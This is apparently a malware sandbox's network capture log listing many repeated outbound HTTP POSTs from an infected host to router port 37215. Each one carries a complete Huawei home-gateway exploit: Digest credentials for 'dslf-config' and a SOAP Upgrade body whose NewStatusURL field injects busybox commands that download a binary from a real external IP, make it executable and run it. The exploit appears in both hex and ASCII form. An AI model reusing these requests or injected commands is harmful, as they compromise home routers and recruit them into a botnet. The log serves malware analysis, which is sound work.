20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1627192.168.2.1543972156.207.226.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460762024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1628192.168.2.1539348156.11.6.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460809946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1629192.168.2.1550238156.152.49.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460812092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1630192.168.2.1546032156.104.6.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460841894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1631192.168.2.1535446156.31.132.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460861921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1632192.168.2.1533744156.41.15.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460881948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1633192.168.2.1544708156.154.179.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460900068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1634192.168.2.1557224156.90.74.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460900068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1635192.168.2.1557576156.182.255.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460937023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1636192.168.2.1550530156.148.129.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460952997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1637192.168.2.1545044156.163.224.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460988998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
